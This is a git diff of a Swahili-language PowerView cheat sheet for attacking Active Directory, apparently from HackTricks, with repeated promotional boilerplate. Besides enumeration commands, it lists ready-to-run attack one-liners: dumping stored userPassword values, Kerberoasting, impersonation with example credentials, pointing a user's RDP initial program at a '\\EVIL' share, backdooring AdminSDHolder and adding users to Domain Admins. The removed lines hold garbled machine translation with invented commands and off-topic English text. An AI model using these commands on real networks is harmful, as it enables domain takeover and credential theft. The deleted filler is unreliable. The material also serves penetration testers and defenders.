* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **nifuatilie** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwenye repo ya [hacktricks](https://github.com/carlospolop/hacktricks) na [hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Je, ungependa kuona **kampuni yako ikionyeshwa kwenye HackTricks**? au ungependa kupata upatikanaji wa **toleo jipya zaidi la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
||||
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) **kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au **kikundi cha telegram**](https://t.me/peass) au **nifuata** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye [repo ya hacktricks](https://github.com/carlospolop/hacktricks) na [repo ya hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -4,19 +4,24 @@
|
|||
|
||||
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
||||
|
||||
* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Je, ungependa kuona **kampuni yako ikionekana katika HackTricks**? Au ungependa kupata ufikiaji wa **toleo jipya zaidi la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **nifuatilie** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Unataka kuona **kampuni yako ikitangazwa kwenye HackTricks**? au unataka kupata upatikanaji wa **toleo jipya la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
||||
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **nifuata** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye [repo ya hacktricks](https://github.com/carlospolop/hacktricks) na [repo ya hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
|
||||
</details>
|
||||
|
||||
Toleo la sasa zaidi la PowerView litakuwa daima kwenye tawi la dev la PowerSploit: [https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1)
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**SharpView**](https://github.com/tevora-threat/SharpView) ni uhamisho wa .NET wa [**PowerView**](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1)
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
### Uchunguzi wa haraka
|
||||
|
||||
Toleo la hivi karibuni zaidi la PowerView daima litakuwepo kwenye tawi la dev la PowerSploit: [https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1)
|
||||
|
||||
[**SharpView**](https://github.com/tevora-threat/SharpView) ni mabadiliko ya .NET ya [**PowerView**](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1)
|
||||
|
||||
### Uchambuzi wa Haraka
|
||||
```powershell
|
||||
Get-NetDomain #Basic domain info
|
||||
#User info
|
||||
|
@ -48,12 +53,6 @@ Invoke-UserHunter -CheckAccess
|
|||
Invoke-ACLScanner -ResolveGUIDs | select IdentityReferenceName, ObjectDN, ActiveDirectoryRights | fl
|
||||
```
|
||||
### Taarifa za Kikoa
|
||||
|
||||
```powershell
|
||||
Get-Domain
|
||||
```
|
||||
|
||||
Amri hii inaruhusu kupata taarifa za kikoa kama vile jina la kikoa, jina la kikoa cha msingi, na mamlaka ya kikoa.
|
||||
```powershell
|
||||
# Domain Info
|
||||
Get-Domain #Get info about the current domain
|
||||
|
@ -76,39 +75,7 @@ Get-NetDomainController -Domain mydomain.local #Get all ifo of specific domain D
|
|||
# Get Forest info
|
||||
Get-ForestDomain
|
||||
```
|
||||
### Watumiaji, Vikundi, Kompyuta, na OU
|
||||
|
||||
#### Get-NetUser
|
||||
|
||||
Amri ya PowerShell `Get-NetUser` hutumiwa kupata habari kuhusu watumiaji wa mtandao. Inatoa maelezo kama vile jina la mtumiaji, jina kamili, SID, na maelezo mengine muhimu.
|
||||
|
||||
```powershell
|
||||
Get-NetUser
|
||||
```
|
||||
|
||||
#### Get-NetGroup
|
||||
|
||||
Amri ya PowerShell `Get-NetGroup` hutumiwa kupata habari kuhusu vikundi vya mtandao. Inatoa maelezo kama vile jina la kikundi, SID, na maelezo mengine muhimu.
|
||||
|
||||
```powershell
|
||||
Get-NetGroup
|
||||
```
|
||||
|
||||
#### Get-NetComputer
|
||||
|
||||
Amri ya PowerShell `Get-NetComputer` hutumiwa kupata habari kuhusu kompyuta za mtandao. Inatoa maelezo kama vile jina la kompyuta, SID, na maelezo mengine muhimu.
|
||||
|
||||
```powershell
|
||||
Get-NetComputer
|
||||
```
|
||||
|
||||
#### Get-NetOU
|
||||
|
||||
Amri ya PowerShell `Get-NetOU` hutumiwa kupata habari kuhusu vitengo vya shirika (OU) za mtandao. Inatoa maelezo kama vile jina la OU, SID, na maelezo mengine muhimu.
|
||||
|
||||
```powershell
|
||||
Get-NetOU
|
||||
```
|
||||
### Watumiaji, Vikundi, Kompyuta & OUs
|
||||
```powershell
|
||||
# Users
|
||||
## Get usernames and their groups
|
||||
|
@ -175,26 +142,6 @@ Get-NetOU #Get Organization Units
|
|||
Get-NetOU StudentMachines | %{Get-NetComputer -ADSPath $_} #Get all computers inside an OU (StudentMachines in this case)
|
||||
```
|
||||
### Kuingia na Vikao
|
||||
|
||||
#### Get-NetLoggedon
|
||||
|
||||
Amri ya PowerShell `Get-NetLoggedon` inatoa habari kuhusu watumiaji walioingia kwenye mfumo. Inaonyesha majina ya watumiaji, kompyuta wanayotumia, na muda wa kuingia.
|
||||
|
||||
#### Get-NetSession
|
||||
|
||||
Amri ya PowerShell `Get-NetSession` inatoa habari kuhusu vikao vya mtumiaji vilivyopo kwenye mfumo. Inaonyesha majina ya watumiaji, kompyuta wanayotumia, na muda wa kuanza kwa kikao.
|
||||
|
||||
#### Get-NetSession -ComputerName <ComputerName>
|
||||
|
||||
Unaweza kutumia amri ya PowerShell `Get-NetSession` na kipengele cha `-ComputerName` ili kupata habari za vikao vya mtumiaji kwenye kompyuta maalum.
|
||||
|
||||
#### Get-NetSession -ComputerName <ComputerName> | Remove-NetSession
|
||||
|
||||
Unaweza kutumia amri ya PowerShell `Get-NetSession` pamoja na kipengele cha `-ComputerName` na kisha kuongeza `| Remove-NetSession` ili kuondoa vikao vya mtumiaji kwenye kompyuta maalum.
|
||||
|
||||
#### Get-NetSession | Remove-NetSession
|
||||
|
||||
Unaweza kutumia amri ya PowerShell `Get-NetSession` pamoja na `| Remove-NetSession` ili kuondoa vikao vyote vya mtumiaji kwenye mfumo.
|
||||
```powershell
|
||||
Get-NetLoggedon -ComputerName <servername> #Get net logon users at the moment in a computer (need admins rights on target)
|
||||
Get-NetSession -ComputerName <servername> #Get active sessions on the host
|
||||
|
@ -202,10 +149,10 @@ Get-LoggedOnLocal -ComputerName <servername> #Get locally logon users at the mom
|
|||
Get-LastLoggedon -ComputerName <servername> #Get last user logged on (needs admin rigths in host)
|
||||
Get-NetRDPSession -ComputerName <servername> #List RDP sessions inside a host (needs admin rights in host)
|
||||
```
|
||||
### Kundi la Sera - GPOs
|
||||
### Kundi la Sera ya Kikundi - GPOs
|
||||
|
||||
Ikiwa mshambuliaji ana **mamlaka ya juu juu ya GPO**, anaweza kuwa na uwezo wa **privesc** kwa kuitumia kwa **kuongeza ruhusa kwa mtumiaji**, **kuongeza mtumiaji wa admin wa ndani** kwenye mwenyeji au **kuunda kazi iliyopangwa** (moja kwa moja) kutekeleza hatua.\
|
||||
Kwa [**maelezo zaidi kuhusu hilo na jinsi ya kulitumia fuata kiungo hiki**](../active-directory-methodology/acl-persistence-abuse/#gpo-delegation).
|
||||
Ikiwa mshambuliaji ana **mamlaka makubwa juu ya GPO** anaweza kuwa na uwezo wa **privesc** kwa kuitumia kwa **kuongeza ruhusa kwa mtumiaji**, **kuongeza mtumiaji wa admin wa ndani** kwenye mwenyeji au **kuunda kazi iliyopangwa** (ya moja kwa moja) kutekeleza kitendo.\
|
||||
Kwa [**maji zaidi kuhusu hilo na jinsi ya kulitumia fuata kiungo hiki**](../active-directory-methodology/acl-persistence-abuse/#gpo-delegation).
|
||||
```powershell
|
||||
#GPO
|
||||
Get-DomainGPO | select displayName #Check the names for info
|
||||
|
@ -266,108 +213,13 @@ Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReference -match "RDPUser
|
|||
#Get special rights over All administrators in domain
|
||||
Get-NetGroupMember -GroupName "Administrators" -Recurse | ?{$_.IsGroup -match "false"} | %{Get-ObjectACL -SamAccountName $_.MemberName -ResolveGUIDs} | select ObjectDN, IdentityReference, ActiveDirectoryRights
|
||||
```
|
||||
### Picha na Folda Zilizoshirikiwa
|
||||
|
||||
Kuna njia kadhaa za kupata habari kuhusu faili na folda zilizoshirikiwa kwenye mtandao wa Windows. Powerview inatoa amri kadhaa za kufanya hivyo.
|
||||
|
||||
#### Get-NetShare
|
||||
|
||||
Amri ya `Get-NetShare` inatoa orodha ya folda zilizoshirikiwa kwenye mfumo wa Windows. Inatoa habari kama vile jina la folda, njia ya folda, na idadi ya watumiaji wanaoshiriki folda hiyo.
|
||||
|
||||
```powershell
|
||||
Get-NetShare
|
||||
```
|
||||
|
||||
#### Get-NetLoggedon
|
||||
|
||||
Amri ya `Get-NetLoggedon` inatoa orodha ya watumiaji walioingia kwenye mfumo wa Windows. Inatoa habari kama vile jina la mtumiaji, jina la kompyuta wanayotumia, na wakati wa kuingia.
|
||||
|
||||
```powershell
|
||||
Get-NetLoggedon
|
||||
```
|
||||
|
||||
#### Get-NetSession
|
||||
|
||||
Amri ya `Get-NetSession` inatoa orodha ya vikao vya mtandao vilivyopo kwenye mfumo wa Windows. Inatoa habari kama vile jina la mtumiaji, jina la kompyuta wanayotumia, na wakati wa kuanza kwa kikao.
|
||||
|
||||
```powershell
|
||||
Get-NetSession
|
||||
```
|
||||
|
||||
#### Get-NetFile
|
||||
|
||||
Amri ya `Get-NetFile` inatoa orodha ya faili zilizoshirikiwa kwenye mfumo wa Windows. Inatoa habari kama vile jina la faili, njia ya faili, na idadi ya watumiaji wanaoshiriki faili hiyo.
|
||||
|
||||
```powershell
|
||||
Get-NetFile
|
||||
```
|
||||
|
||||
#### Get-NetPrinter
|
||||
|
||||
Amri ya `Get-NetPrinter` inatoa orodha ya wachapishaji (printers) zilizoshirikiwa kwenye mfumo wa Windows. Inatoa habari kama vile jina la wachapishaji, njia ya wachapishaji, na idadi ya watumiaji wanaoshiriki wachapishaji hao.
|
||||
|
||||
```powershell
|
||||
Get-NetPrinter
|
||||
```
|
||||
|
||||
#### Get-NetConnectionProfile
|
||||
|
||||
Amri ya `Get-NetConnectionProfile` inatoa habari kuhusu profaili za uhusiano wa mtandao kwenye mfumo wa Windows. Inatoa habari kama vile jina la profaili, aina ya uhusiano, na hali ya uhusiano.
|
||||
|
||||
```powershell
|
||||
Get-NetConnectionProfile
|
||||
```
|
||||
|
||||
#### Get-NetFirewallRule
|
||||
|
||||
Amri ya `Get-NetFirewallRule` inatoa orodha ya sheria za firewall zilizopo kwenye mfumo wa Windows. Inatoa habari kama vile jina la sheria, hatua iliyoruhusiwa, na maelezo ya sheria.
|
||||
|
||||
```powershell
|
||||
Get-NetFirewallRule
|
||||
```
|
||||
|
||||
#### Get-NetOffloadGlobalSetting
|
||||
|
||||
Amri ya `Get-NetOffloadGlobalSetting` inatoa mazingira ya kushirikisha mzigo (offloading) ya mtandao kwenye mfumo wa Windows. Inatoa habari kama vile hali ya kushirikisha mzigo, aina ya kushirikisha mzigo, na mipangilio mingine ya kushirikisha mzigo.
|
||||
|
||||
```powershell
|
||||
Get-NetOffloadGlobalSetting
|
||||
```
|
||||
|
||||
#### Get-NetOffloadProfile
|
||||
|
||||
Amri ya `Get-NetOffloadProfile` inatoa maelezo ya kushirikisha mzigo ya profaili za mtandao kwenye mfumo wa Windows. Inatoa habari kama vile jina la profaili, aina ya kushirikisha mzigo, na mipangilio mingine ya kushirikisha mzigo.
|
||||
|
||||
```powershell
|
||||
Get-NetOffloadProfile
|
||||
```
|
||||
|
||||
#### Get-NetOffloadSetting
|
||||
|
||||
Amri ya `Get-NetOffloadSetting` inatoa maelezo ya kushirikisha mzigo ya mipangilio ya mtandao kwenye mfumo wa Windows. Inatoa habari kama vile jina la kadi ya mtandao, aina ya kushirikisha mzigo, na mipangilio mingine ya kushirikisha mzigo.
|
||||
|
||||
```powershell
|
||||
Get-NetOffloadSetting
|
||||
```
|
||||
### Faili na folda zilizoshirikishwa
|
||||
```powershell
|
||||
Get-NetFileServer #Search file servers. Lot of users use to be logged in this kind of servers
|
||||
Find-DomainShare -CheckShareAccess #Search readable shares
|
||||
Find-InterestingDomainShareFile #Find interesting files, can use filters
|
||||
```
|
||||
### Uaminifu wa Kikoa
|
||||
|
||||
Domain Trust ni uhusiano kati ya vikoa viwili ambao huruhusu watumiaji na vifaa kutoka kikoa kimoja kupata rasilimali za kikoa kingine. Uaminifu wa kikoa unaweza kuwa wa aina tofauti, kama vile uaminifu wa moja kwa moja, uaminifu wa transitive, au uaminifu wa nusu-transitive.
|
||||
|
||||
#### Uaminifu wa Moja kwa Moja
|
||||
Katika uaminifu wa moja kwa moja, vikoa viwili vinaweza kuaminiana moja kwa moja bila kuhitaji uaminifu kutoka kwa vikoa vingine. Hii inaruhusu watumiaji na vifaa kutoka kikoa kimoja kupata rasilimali za kikoa kingine moja kwa moja.
|
||||
|
||||
#### Uaminifu wa Transitive
|
||||
Uaminifu wa transitive hutokea wakati vikoa vingi vina uaminifu na kila mmoja. Hii inamaanisha kuwa ikiwa kuna uaminifu kati ya Kikoa A na Kikoa B, na pia kati ya Kikoa B na Kikoa C, basi kutakuwa na uaminifu wa transitive kati ya Kikoa A na Kikoa C. Hii inaruhusu watumiaji na vifaa kutoka Kikoa A kupata rasilimali za Kikoa C kupitia Kikoa B.
|
||||
|
||||
#### Uaminifu wa Nusu-Transitive
|
||||
Uaminifu wa nusu-transitive ni aina ya uaminifu ambapo uaminifu wa transitive unaruhusiwa kutoka kikoa kimoja kwenda kingine, lakini sio kutoka kikoa kingine kurudi kikoa cha awali. Hii inamaanisha kuwa watumiaji na vifaa kutoka Kikoa A wanaweza kupata rasilimali za Kikoa B kupitia Kikoa C, lakini sio kutoka Kikoa B kurudi Kikoa A.
|
||||
|
||||
Uaminifu wa kikoa ni muhimu katika mazingira ya mtandao ambapo kuna vikoa vingi na unahitaji kutoa ufikiaji wa rasilimali kati ya vikoa hivyo. Hata hivyo, inapaswa kuzingatiwa kwa uangalifu ili kuhakikisha usalama wa mtandao na kuzuia upenyezaji usiohitajika.
|
||||
### Kuaminiana kwa Kikoa
|
||||
```powershell
|
||||
Get-NetDomainTrust #Get all domain trusts (parent, children and external)
|
||||
Get-DomainTrust #Same
|
||||
|
@ -385,17 +237,6 @@ Get-DomainForeingUser #Get users with privileges in other domains inside the for
|
|||
Get-DomainForeignGroupMember #Get groups with privileges in other domains inside the forest
|
||||
```
|
||||
### Matunda ya Chini ya Mti
|
||||
|
||||
Matunda ya Chini ya Mti ni hatua za kwanza na rahisi za kuchukua katika kuhakikisha usalama wa mfumo wako. Hatua hizi ni rahisi kutekeleza na mara nyingi hutoa matokeo mazuri katika kuzuia mashambulizi ya kawaida. Hapa kuna baadhi ya hatua za kuzingatia:
|
||||
|
||||
- Kuhakikisha kuwa programu zote zilizosakinishwa zimeboreshwa na zina matoleo ya hivi karibuni. Hii inasaidia kuziba mapungufu yoyote ya usalama ambayo yanaweza kutumiwa na wadukuzi.
|
||||
- Kuweka nenosiri lenye nguvu kwa akaunti zote za mtumiaji. Nenosiri lenye nguvu linapaswa kuwa na herufi za juu na za chini, nambari, na alama za kipekee.
|
||||
- Kufunga na kusanikisha programu za usalama kama vile antivirus na firewall. Programu hizi zinasaidia kugundua na kuzuia vitisho vya usalama.
|
||||
- Kupunguza idadi ya akaunti za mtumiaji zilizosajiliwa kwenye mfumo wako. Kila akaunti ya mtumiaji inaleta hatari ya usalama, hivyo ni vyema kuwa na idadi ndogo ya akaunti zilizosajiliwa.
|
||||
- Kufuatilia na kurekodi shughuli za mfumo ili kugundua haraka shughuli zisizo za kawaida au mashambulizi ya kudukua.
|
||||
- Kufunga na kusanikisha sasisho za usalama mara kwa mara. Sasisho hizi zinajumuisha maboresho ya usalama na marekebisho ya mapungufu yaliyogunduliwa.
|
||||
|
||||
Kwa kuzingatia hatua hizi za msingi, unaweza kuimarisha usalama wa mfumo wako na kupunguza hatari ya kushambuliwa na wadukuzi.
|
||||
```powershell
|
||||
#Check if any user passwords are set
|
||||
$FormatEnumerationLimit=-1;Get-DomainUser -LDAPFilter '(userPassword=*)' -Properties samaccountname,memberof,userPassword | % {Add-Member -InputObject $_ NoteProperty 'Password' "$([System.Text.Encoding]::ASCII.GetString($_.userPassword))" -PassThru} | fl
|
||||
|
@ -434,14 +275,6 @@ Invoke-UserHunter -GroupName "RDPUsers"
|
|||
Invoke-UserHunter -Stealth
|
||||
```
|
||||
### Vitu vilivyofutwa
|
||||
|
||||
Kazi ya Powerview inaweza kutumika kutambua vitu vilivyofutwa katika mfumo wa Windows Active Directory. Hii ni muhimu kwa wapenzi wa uchunguzi wa usalama na wapenzi wa uchunguzi wa uhalifu wa kompyuta. Powerview inatoa njia rahisi ya kutambua vitu vilivyofutwa kama vile watumiaji, vikundi, na vituo vya kudhibiti.
|
||||
|
||||
Kutumia amri ya `Get-DomainDeletedObject` inaruhusu mtumiaji kupata orodha ya vitu vilivyofutwa katika mfumo wa Active Directory. Amri hii inaweza kufanywa kwa kutumia amri ya `Get-DomainDeletedObject -Type User` ili kupata orodha ya watumiaji vilivyofutwa.
|
||||
|
||||
Kwa kuongeza, Powerview inatoa njia ya kurejesha vitu vilivyofutwa. Kwa kutumia amri ya `Restore-DomainObject`, mtumiaji anaweza kurejesha vitu vilivyofutwa kama vile watumiaji na vikundi. Hii inaweza kuwa muhimu katika kurejesha data iliyopotea au kufuatilia shughuli za uhalifu wa kompyuta.
|
||||
|
||||
Kwa ujumla, Powerview inatoa zana muhimu kwa wapenzi wa uchunguzi wa usalama na wapenzi wa uchunguzi wa uhalifu wa kompyuta kwa kutambua na kurejesha vitu vilivyofutwa katika mfumo wa Active Directory.
|
||||
```powershell
|
||||
#This isn't a powerview command, it's a feature from the AD management powershell module of Microsoft
|
||||
#You need to be in the AD Recycle Bin group of the AD to list the deleted AD objects
|
||||
|
@ -450,53 +283,21 @@ Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
|
|||
### MISC
|
||||
|
||||
#### SID hadi Jina
|
||||
|
||||
```powershell
|
||||
ConvertFrom-SID -SID <SID>
|
||||
```
|
||||
|
||||
Hii amri inatumika kubadilisha SID kuwa jina lake. Unahitaji kutoa SID kama parameter.
|
||||
```powershell
|
||||
"S-1-5-21-1874506631-3219952063-538504511-2136" | Convert-SidToName
|
||||
```
|
||||
#### Kerberoast
|
||||
|
||||
Kerberoast ni mbinu ya kuvunja nywila za akaunti za huduma za Active Directory (AD) ambazo hutumia itifaki ya Kerberos. Mbinu hii inategemea udhaifu katika mchakato wa kutoa tiketi za huduma za Kerberos.
|
||||
|
||||
Kwa kawaida, tiketi za huduma za Kerberos zinazotolewa kwa akaunti za huduma za AD zinahifadhiwa kwa kutumia algorithm ya RC4. Hii inamaanisha kuwa tiketi hizo zinaweza kuvunjwa na kuchambuliwa ili kupata nywila za akaunti hizo.
|
||||
|
||||
Kerberoast inaruhusu mtu mwenye ujuzi wa kutosha kuchukua tiketi za huduma za Kerberos kutoka kwa AD na kuzichambua nje ya mazingira ya AD. Kwa kufanya hivyo, wanaweza kutumia teknolojia ya GPU au CPU yenye nguvu ili kuvunja nywila hizo kwa haraka.
|
||||
|
||||
Mara tu nywila za akaunti zinapovunjwa, mtu huyo anaweza kuzitumia kwa madhumuni mabaya, kama kuingia kwenye mfumo au kufikia rasilimali zilizolindwa.
|
||||
|
||||
Ni muhimu kwa watumiaji wa AD kuchukua hatua za kuzuia Kerberoast kwa kutekeleza sera kali za nywila na kudhibiti upatikanaji wa akaunti za huduma.
|
||||
```powershell
|
||||
Invoke-Kerberoast [-Identity websvc] #Without "-Identity" kerberoast all possible users
|
||||
```
|
||||
#### Tumia vitambulisho tofauti (hoja)
|
||||
|
||||
Unapotumia PowerView, unaweza kutumia vitambulisho tofauti kwa kutumia hoja ya `-Credential`. Hoja hii inakuwezesha kuingiza vitambulisho vya mtumiaji tofauti ili kupata ufikiaji wa rasilimali zilizohifadhiwa. Unaweza kutumia vitambulisho hivi kwa njia ifuatayo:
|
||||
|
||||
```powershell
|
||||
Get-NetUser -Credential $cred
|
||||
```
|
||||
|
||||
Katika mfano huu, `$cred` inawakilisha vitambulisho vya mtumiaji. Kwa kufanya hivyo, unaweza kupata habari za mtumiaji kwa kutumia vitambulisho tofauti.
|
||||
#### Tumia sifa tofauti (hoja)
|
||||
```powershell
|
||||
# use an alterate creadential for any function
|
||||
$SecPassword = ConvertTo-SecureString 'BurgerBurgerBurger!' -AsPlainText -Force
|
||||
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
|
||||
Get-DomainUser -Credential $Cred
|
||||
```
|
||||
#### Jifanya kuwa mtumiaji
|
||||
|
||||
Unapotumia PowerView, unaweza kujifanya kuwa mtumiaji mwingine kwenye mfumo. Hii inaweza kuwa muhimu katika kuchunguza mazingira na kubaini udhaifu. Unaweza kutumia amri ifuatayo:
|
||||
|
||||
```powershell
|
||||
Invoke-UserImpersonation -Username <username>
|
||||
```
|
||||
|
||||
Badilisha `<username>` na jina la mtumiaji unayetaka kujifanya kuwa. Kumbuka kuwa unahitaji kuwa na idhini sahihi za kufanya hivyo.
|
||||
#### Kujifanya kuwa mtumiaji
|
||||
```powershell
|
||||
# if running in -sta mode, impersonate another credential a la "runas /netonly"
|
||||
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
|
||||
|
@ -506,26 +307,6 @@ Invoke-UserImpersonation -Credential $Cred
|
|||
Invoke-RevertToSelf
|
||||
```
|
||||
#### Weka thamani
|
||||
|
||||
To set values in PowerShell, you can use the `Set-Variable` cmdlet. This cmdlet allows you to assign a value to a variable. The syntax is as follows:
|
||||
|
||||
```powershell
|
||||
Set-Variable -Name <variable_name> -Value <value>
|
||||
```
|
||||
|
||||
For example, to set the value of a variable named `$name` to "John", you would use the following command:
|
||||
|
||||
```powershell
|
||||
Set-Variable -Name name -Value "John"
|
||||
```
|
||||
|
||||
You can also use the assignment operator (`=`) to set values directly. For example:
|
||||
|
||||
```powershell
|
||||
$name = "John"
|
||||
```
|
||||
|
||||
Both methods achieve the same result of assigning a value to a variable.
|
||||
```powershell
|
||||
# set the specified property for the given user identity
|
||||
Set-DomainObject testuser -Set @{'mstsinitialprogram'='\\EVIL\program.exe'} -Verbose
|
||||
|
@ -536,14 +317,18 @@ Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=lo
|
|||
# Add user to 'Domain Admins'
|
||||
Add-NetGroupUser -Username username -GroupName 'Domain Admins' -Domain my.domain.local
|
||||
```
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Je, ungependa kuona **kampuni yako ikionekana katika HackTricks**? Au ungependa kupata ufikiaji wa **toleo jipya zaidi la PEASS au kupakua HackTricks kwa muundo wa PDF**? Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Je ufanyaji kazi katika **kampuni ya usalama wa mtandao**? Unataka kuona **kampuni yako ikitangazwa kwenye HackTricks**? au unataka kupata upatikanaji wa **toleo jipya la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
||||
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **nifuatilie** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye [repo ya hacktricks](https://github.com/carlospolop/hacktricks) na [repo ya hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) **Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au **kikundi cha telegram**](https://t.me/peass) au **nifuata** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwenye [repo ya hacktricks](https://github.com/carlospolop/hacktricks) na [repo ya hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
|
||||
</details>
|
||||
|
|
Loading…
Add table
Reference in a new issue